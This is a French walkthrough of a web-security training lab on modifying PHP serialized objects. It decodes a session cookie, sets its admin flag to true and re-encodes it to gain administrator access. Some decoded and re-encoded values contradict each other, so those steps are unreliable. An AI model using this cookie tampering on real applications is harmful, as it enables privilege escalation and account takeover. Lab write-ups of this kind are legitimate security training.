Modification d’objets sérialisés

Modifying serialized objects

Lab: Modifying serialized objects | Web Security AcademyWebSecAcademy

Ce laboratoire utilise un mécanisme de session basé sur la sérialisation et présente une vulnérabilité permettant une élévation de privilèges. L’objectif est de modifier l’objet sérialisé stocké dans le cookie de session afin d’obtenir des privilèges administrateur, puis de supprimer l’utilisateur carlos.

Un compte utilisateur est fourni pour démarrer :

Identifiant : wiener
Mot de passe : peter

Observation initiale

Après l’authentification, une requête de connexion est envoyée :

POST /login HTTP/2

Host: 0a66003e03add3bb824ef63c001200c9.web-security-academy.net

Cookie: session=

Content-Length: 30



username=wiener&password=peter

Le serveur répond avec un cookie de session :

Set-Cookie: session=Tzo0OiJVc2VyIjoyOntzOjg6InVzZXJuYW1lIjtzOjY6IndpZW5lciI7czo1OiJhZG1pbiI7YjowO30%3d;

Analyse du cookie de session

Le contenu du cookie est encodé en Base64. Une fois décodé, on obtient un objet PHP sérialisé :

O:4:"User":2:{s:8:"username";s:6:"carlos";s:5:"admin";b:0;}

Cet objet contient :

le nom d’utilisateur (username)
un indicateur de privilèges administrateur (admin), défini à false (b:0)

echo "O:4:"User":2:{s:8:"username";s:6:"carlos";s:5:"admin";b:0;}" | base64 ; echo

Réencodage de l’objet en Base64 :

Tzo0OlVzZXI6Mjp7czo4OnVzZXJuYW1lO3M6NjpjYXJsb3M7czo1OmFkbWluO2I6MDt9Cg==

Modification de l’objet sérialisé

L’objet peut être modifié côté client avant d’être renvoyé au serveur.

Changement du nom d’utilisateur en carlos :
Activation des privilèges administrateur en passant admin à true :

echo "O:4:"User":2:{s:8:"username";s:6:"carlos";s:5:"admin";b:1;}" | base64 ; echo

Réencodage de l’objet en Base64 :

Tzo0OiJVc2VyIjoyOntzOjg6InVzZXJuYW1lIjtzOjY6ImNhcmxvcyI7czo1OiJhZG1pbiI7YjoxO30lM2Q=

Exploitation

Le cookie de session est remplacé par la nouvelle valeur modifiée.

Mis à jour il y a 2 mois

hashtagModifying serialized objects

Modifying serialized objects